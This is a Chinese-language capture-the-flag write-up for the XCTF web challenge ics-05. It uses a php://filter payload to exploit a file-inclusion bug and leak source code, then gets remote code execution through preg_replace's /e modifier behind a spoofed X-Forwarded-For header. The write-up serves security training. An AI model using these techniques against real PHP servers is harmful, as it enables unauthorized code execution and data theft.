攻防世界 web ics-05
进入题目依旧是这个场景我们去设备维护中心看看
然后去云平台设备维护中心
我们重点来观察url发现这里可能存在文件包含,我们使用伪协议读取看看
php://filter/convert.base64-encode/resource=index.php
发现加密后的base64
我们解密发现源码
<?php error_reporting(0); ? @session_start(); posix_setuid(1000); ? ? ?> ?设备维护中心 ?
- class="layui-nav">
- class="layui-nav-item layui-this">云平台设备维护中心
class="lead"><?php echo $page; die();?>
? <?php ? }else{ ? ?>
class="lead"> <?php ? if (strpos($page, 'input') > 0) { die(); } ? if (strpos($page, 'ta:text') > 0) { die(); } ? if (strpos($page, 'text') > 0) { die(); } ? if ($page === 'index.php') { die('Ok'); } include($page); die(); ?>
? <?php }} ? ? //方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试 ? if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { ? echo "
Welcome My Admin !
"; ? $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; ? if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } ? } ? ? ? ? ? ?> ? ? ?
开始审计代码简单看了一下之后发现利用点在这里
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { ? echo "
Welcome My Admin !
"; ? $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; ? if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } ? }
此处存在preg_replace函数,感觉会存在命令注入漏洞,函数作用:搜索subject中匹配pattern的部分,以replacement进行替换。此处考察的是preg_replace函数使用/e参数导致代码执行的问题。也就是说,pat值和sub值相同,rep的代码会执行。XFF改成127.0.0.1后就会通过GET方式传进来三个参数。这里调用了preg_replace函数。并且没有对pat参数进行过滤,所以这里我们可以传入"-e"触发漏洞
发现成功rce
然后直接去cat flag即可